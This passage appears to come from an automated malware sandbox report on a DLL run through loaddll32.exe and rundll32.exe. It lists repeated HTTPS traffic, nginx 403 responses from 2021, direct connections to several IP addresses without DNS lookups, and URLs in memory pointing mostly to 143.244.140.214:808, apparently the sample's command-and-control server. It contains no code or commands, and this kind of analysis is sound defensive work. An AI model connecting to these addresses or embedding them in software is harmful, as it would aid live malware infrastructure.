                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50162
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:57:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:58:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:25 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:59:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:07 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:33 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:41 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:00:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:01:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.554532651.0000000000714000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000002.872703373.00000000015AB000.00000004.00000020.sdmp, rundll32.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://14.77.0.96:6891/
                      Source: rundll32.exe, 00000003.00000002.874111999.00000000006CA000.00000004.00000020.sdmpString found in binary or memory: https://142.46.210.220/
                      Source: rundll32.exeString found in binary or memory: https://143.244.140.214/
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/%
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/6
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/N
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmp, rundll32.exeString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.796127425.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/4
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/9
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.548927773.00000000015B9000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/T
                      Source: rundll32.exe, 00000003.00000003.798077134.0000000000739000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.742742966.000000000073E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/em32
                      Source: rundll32.exe, 00000003.00000003.527805201.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/h
                      Source: loaddll32.exe, 00000000.00000002.872719841.00000000015B8000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy/
                      Source: rundll32.exe, 00000003.00000003.772836291.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy4
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hyg
                      Source: rundll32.exe, 00000003.00000003.711929481.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hyz
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l/
                      Source: rundll32.exe, 00000003.00000003.632556707.0000000000736000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l0
                      Source: rundll32.exe, 00000003.00000003.781390646.000000000073D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l9
                      Source: loaddll32.exe, 00000000.00000002.872645972.0000000001558000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lg
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll
                      Source: rundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/ll&
                      Source: rundll32.exe, 00000003.00000003.562908687.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/llg
                      Source: rundll32.exe, 00000003.00000003.591021257.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/llh
                      Source: rundll32.exe, 00000003.00000003.546159966.0000000000739000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/lq
